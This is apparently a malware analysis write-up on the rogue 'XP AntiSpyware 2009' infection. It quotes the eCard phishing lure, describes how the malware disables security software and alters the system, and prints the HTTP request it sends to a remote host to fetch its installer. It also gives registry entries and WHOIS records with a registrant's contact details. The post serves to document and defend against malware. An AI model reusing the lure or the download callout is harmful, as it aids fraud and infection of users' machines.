Subject.
You have received an eCardBody.
Good day.
You have received an eCard
To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):
[link removed]/e-card.exe
Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!
We hope you enjoy you eCard.
Thank You!
Upon execution, eCard.exe will immediately reboot the computer. A very unpleasant surprise awaits the victim when s/he reaches the desktop: antivirus & firewall have been disabled by deleting their corresponding services and startup entries.
braviax.exe was set to run upon boot.
We find ourselves with a new tray icon pretending that our computer is infected with spyware.
Clicking on the icon / message will trigger the installer previously downloaded from the web.
XP AntiSpyware 2009 is downloaded from internet and installed on our PC.
Now, I had a good laugh when I saw this fatal error during the initial scan ...
The rogue also installs the fake Windows Security center with the link to buy a license for XP Antispyware 2009.
In meanwhile several changes have been done to our system.
- Destroys existing antivirus & firewall solutions.
- Notification of firewall, antivirus and/or update status through the real Windows Security Center have been disabled.
- Internet Explorer start page & search have been changed to google.com
- Explorer.exe has been forced to show the "classic view", the usual tasks and links are thus missing on the left side.
- Several Internet security settings have been lowered, the system is thus vulnerable to additional infections during surfing.
- Beep.sys has been replaced.
c:\WINDOWS\system32\drivers\beep.sys
Kaspersky: Backdoor.Win32.UltimateDefender.a
Old date: 8/4/2004 2:00 PM
New date: 10/9/2008 4:37 PM
Old size: 4,224 bytes
New size: 27,648 bytes
Visible signs.CODEGET /update_inst.php?wmid=1058&subid=[removed] HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: do-monster-scan.com
Connection: Keep-Alive
O4 - HKLM\..\Run: [braviax] C:\WINDOWS\system32\braviax.exe
O4 - HKLM\..\Run: [XP Antispyware 2009] "C:\Program Files\XP_AntiSpyware\XP_AntiSpyware.exe" /hide
O4 - HKCU\..\Run: [braviax] C:\WINDOWS\system32\braviax.exe
O20 - AppInit_DLLs: karna.dat
<h4>
IP details.
</h4>do-scan-progress.com - 208.73.210.32
Registrant:
Shestakov Yuriy alexvasiliev1987@cocainmail.com +7.9218839910
Shestakov Yuriy
Lenina 21 16
Mirniy,MSK,RU 102422
Domain Name:do-scan-progress.com
Record last updated at 2008-10-01 20:45:22
Record created on 2008/9/29
Record expired on 2009/9/29
Domain servers in listed order:
ns1.dsredirection.com
ns2.dsredirection.com
Administrator:
name: Shestakov Yuriy
mail: alexvasiliev1987@cocainmail.com tel: +7.9218839910
org: Shestakov Yuriy
address: Lenina 21 16
city: Mirniy
province: MSK
country: RU
postcode: 102422
Registration Service Provider:
name: Shestakov Yuriy
tel: +7.9218839910
fax: +7.9218839910
web:
______________________________
www.xp-antispyware2009.com - 206.161.120.20
Registrant:
Shestakov Yuriy alexvasiliev1987@cocainmail.com +7.9218839910
Shestakov Yuriy
Lenina 21 16
Mirniy,MSK,RU 102422
Domain Name:xp-antispyware2009.com
Record last updated at 2008-10-01 14:10:01
Record created on 2008/9/30
Record expired on 2009/9/30
Domain servers in listed order:
ns1.softwarenameservers.com
ns2.softwarenameservers.com
hostnames sharing ip with a-records
- av-pro2009.com
- www.antiviruspro2009.com
- xp-antispyware2009.com
do-monster-scan.com - 216.195.58.160
Registrant:
Shestakov Yuriy alexvasiliev1987@cocainmail.com +7.9218839910
Shestakov Yuriy
Lenina 21 16
Mirniy,MSK,RU 102422
Domain Name:do-monster-scan.com
Record last updated at 2008-10-01 20:46:28
Record created on 2008/9/29
Record expired on 2009/9/29
Domain servers in listed order:
ns1.nameservanos.com
ns2.nameservanos.com